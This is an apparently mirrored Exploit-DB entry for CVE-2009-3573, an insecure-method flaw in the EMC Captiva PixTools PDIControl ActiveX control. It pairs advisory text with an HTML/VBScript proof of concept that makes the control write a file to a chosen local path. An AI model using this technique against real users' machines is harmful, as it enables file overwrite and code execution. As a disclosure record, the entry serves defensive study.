- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 33263
- Проверка EDB
-
- Пройдено
- Автор
- GIUSEPPE FUGGIANO
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2009-3573
- Дата публикации
- 2009-10-01
HTML:
source: https://www.securityfocus.com/bid/36566/info
The EMC Captiva PixTools Distributed Imaging ActiveX control is prone to multiple insecure-method vulnerabilities that affect the PDIControl.PDI.1 ActiveX control (PDIControl.dll).
Successfully exploiting these issues allows remote attackers to create or overwrite arbitrary local files, which may lead to arbitrary code execution.
PDIControl.dll 2.2.3160.0 is vulnerable; other versions may also be affected.
<object classid='clsid:00200338-3D33-4FFC-AC20-67AA234325F3' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.SetLogLevel 1 test.SetLogFileName "c:\some.txt" test.WriteToLog 1, "Hello World!" End Sub </script>
- Источник
- www.exploit-db.com